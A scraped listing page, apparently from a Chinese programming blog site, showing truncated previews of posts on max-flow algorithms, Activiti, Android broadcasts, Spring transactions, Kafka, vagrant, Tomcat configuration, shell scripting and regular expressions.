  • POJ-1273-Drainage Ditches aijuans ACM_POJ
    POJ-1273-Drainage Ditches http://poj.org/problem?id=1273 基本的最大流,按LRJ的白书写的 #include<iostream> #include<cstring> #include<queue> using namespace std; #define INF 0x7fffffff int ma
  • 工作流Activiti5表的命名及含义 atongyeye 工作流Activiti
    activiti5 - http://activiti.org/designer/update在线插件安装 activiti5一共23张表 Activiti的表都以ACT_开头。 第二部分是表示表的用途的两个字母标识。 用途也和服务的API对应。 ACT_RE_*: 'RE'表示repository。 这个前缀的表包含了流程定义和流程静态资源 (图片,规则,等等)。 A
  • android的广播机制和广播的简单使用 百合不是茶 android广播机制广播的注册
          Android广播机制简介 在Android中,有一些操作完成以后,会发送广播,比如说发出一条短信,或打出一个电话,如果某个程序接收了这个广播,就会做相应的处理。这个广播跟我们传统意义中的电台广播有些相似之处。之所以叫做广播,就是因为它只负责“说”而不管你“听不听”,也就是不管你接收方如何处理。另外,广播可以被不只一个应用程序所接收,当然也可能不被任何应
  • Spring事务传播行为详解 bijian1013 javaspring事务传播行为
            在service类前加上@Transactional,声明这个service所有方法需要事务管理。每一个业务方法开始时都会打开一个事务。         Spring默认情况下会对运行期例外(RunTimeException)进行事务回滚。这
  • eidtplus operate 征客丶 eidtplus
    开启列模式: Alt+C 鼠标选择   OR   Alt+鼠标左键拖动 列模式替换或复制内容(多行): 右键-->格式-->填充所选内容-->选择相应操作 OR Ctrl+Shift+V(复制多行数据,必须行数一致) -------------------------------------------------------
  • 【Kafka一】Kafka入门 bit1129 kafka
    这篇文章来自Spark集成Kafka(http://bit1129.iteye.com/blog/2174765),这里把它单独取出来,作为Kafka的入门吧   下载Kafka http://mirror.bit.edu.cn/apache/kafka/0.8.1.1/kafka_2.10-0.8.1.1.tgz 2.10表示Scala的版本,而0.8.1.1表示Kafka
  • Spring 事务实现机制 BlueSkator spring代理事务
    Spring是以代理的方式实现对事务的管理。我们在Action中所使用的Service对象,其实是代理对象的实例,并不是我们所写的Service对象实例。既然是两个不同的对象,那为什么我们在Action中可以象使用Service对象一样的使用代理对象呢?为了说明问题,假设有个Service类叫AService,它的Spring事务代理类为AProxyService,AService实现了一个接口
  • bootstrap源码学习与示例:bootstrap-dropdown(转帖) BreakingBad bootstrapdropdown
    bootstrap-dropdown组件是个烂东西,我读后的整体感觉。 一个下拉开菜单的设计: <ul class="nav pull-right"> <li id="fat-menu" class="dropdown">
  • 读《研磨设计模式》-代码笔记-中介者模式-Mediator bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /* * 中介者模式(Mediator):用一个中介对象来封装一系列的对象交互。 * 中介者使各对象不需要显式地相互引用,从而使其耦合松散,而且可以独立地改变它们之间的交互。 * * 在我看来,Mediator模式是把多个对象(
  • 常用代码记录 chenjunt3 UIExcelJ#
      1、单据设置某行或某字段不能修改 //i是行号,"cash"是字段名称 getBillCardPanelWrapper().getBillCardPanel().getBillModel().setCellEditable(i, "cash", false); //取得单据表体所有项用以上语句做循环就能设置整行了 getBillC
  • 搜索引擎与工作流引擎 comsci 算法工作搜索引擎网络应用
          最近在公司做和搜索有关的工作,(只是简单的应用开源工具集成到自己的产品中)工作流系统的进一步设计暂时放在一边了,偶然看到谷歌的研究员吴军写的数学之美系列中的搜索引擎与图论这篇文章中的介绍,我发现这样一个关系(仅仅是猜想)   -----搜索引擎和流程引擎的基础--都是图论,至少像在我在JWFD中引擎算法中用到的是自定义的广度优先
  • oracle Health Monitor daizj oracleHealth Monitor
    About Health Monitor Beginning with Release 11g, Oracle Database includes a framework called Health Monitor for running diagnostic checks on the database. About Health Monitor Checks Health M
  • JSON字符串转换为对象 dieslrae javajson
        作为前言,首先是要吐槽一下公司的脑残编译部署方式,web和core分开部署本来没什么问题,但是这丫居然不把json的包作为基础包而作为web的包,导致了core端不能使用,而且我们的core是可以当web来用的(不要在意这些细节),所以在core中处理json串就是个问题.没办法,跟编译那帮人也扯不清楚,只有自己写json的解析了.   
  • C语言学习八结构体,综合应用,学生管理系统 dcj3sjt126com C语言
    实现功能的代码: # include <stdio.h> # include <malloc.h> struct Student { int age; float score; char name[100]; }; int main(void) { int len; struct Student * pArr; int i,
  • vagrant学习笔记 dcj3sjt126com vagrant
    想了解多主机是如何定义和使用的, 所以又学习了一遍vagrant   1. vagrant virtualbox 下载安装 https://www.vagrantup.com/downloads.html https://www.virtualbox.org/wiki/Downloads   查看安装在命令行输入vagrant     2.
  • 14.性能优化-优化-软件配置优化 frank1234 软件配置性能优化
    1.Tomcat线程池 修改tomcat的server.xml文件: <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" maxThreads="1200" m
  • 一个不错的shell 脚本教程 入门级 HarborChung linuxshell
    一个不错的shell 脚本教程 入门级 建立一个脚本   Linux中有好多中不同的shell,但是通常我们使用bash (bourne again shell) 进行shell编程,因为bash是免费的并且很容易使用。所以在本文中笔者所提供的脚本都是使用bash(但是在大多数情况下,这些脚本同样可以在 bash的大姐,bourne shell中运行)。   如同其他语言一样
  • Spring4新特性——核心容器的其他改进 jinnianshilongnian spring动态代理spring4依赖注入
    Spring4新特性——泛型限定式依赖注入 Spring4新特性——核心容器的其他改进 Spring4新特性——Web开发的增强 Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC  Spring4新特性——Groovy Bean定义DSL Spring4新特性——更好的Java泛型操作API  Spring4新
  • Linux设置tomcat开机启动 liuxingguome tomcatlinux开机自启动
    执行命令sudo gedit /etc/init.d/tomcat6 然后把以下英文部分复制过去。(注意第一句#!/bin/sh如果不写,就不是一个shell文件。然后将对应的jdk和tomcat换成你自己的目录就行了。 #!/bin/bash # # /etc/rc.d/init.d/tomcat # init script for tomcat precesses
  • 第13章 Ajax进阶(下) onestopweb Ajax
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • Troubleshooting Crystal Reports off BW blueoxygen BO
    http://wiki.sdn.sap.com/wiki/display/BOBJ/Troubleshooting+Crystal+Reports+off+BW#TroubleshootingCrystalReportsoffBW-TracingBOE   Quite useful, especially this part: SAP BW connectivity For t
  • Java开发熟手该当心的11个错误 tomcat_oracle javajvm多线程单元测试
    #1、不在属性文件或XML文件中外化配置属性。比如,没有把批处理使用的线程数设置成可在属性文件中配置。你的批处理程序无论在DEV环境中,还是UAT(用户验收 测试)环境中,都可以顺畅无阻地运行,但是一旦部署在PROD 上,把它作为多线程程序处理更大的数据集时,就会抛出IOException,原因可能是JDBC驱动版本不同,也可能是#2中讨论的问题。如果线程数目 可以在属性文件中配置,那么使它成为
  • 正则表达式大全 yang852220741 html编程正则表达式
    今天向大家分享正则表达式大全,它可以大提高你的工作效率 正则表达式也可以被当作是一门语言,当你学习一门新的编程语言的时候,他们是一个小的子语言。初看时觉得它没有任何的意义,但是很多时候,你不得不阅读一些教程,或文章来理解这些简单的描述模式。 一、校验数字的表达式 数字:^[0-9]*$ n位的数字:^\d{n}$ 至少n位的数字:^\d{n,}$ m-n位的数字:^\d{m,n}$
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他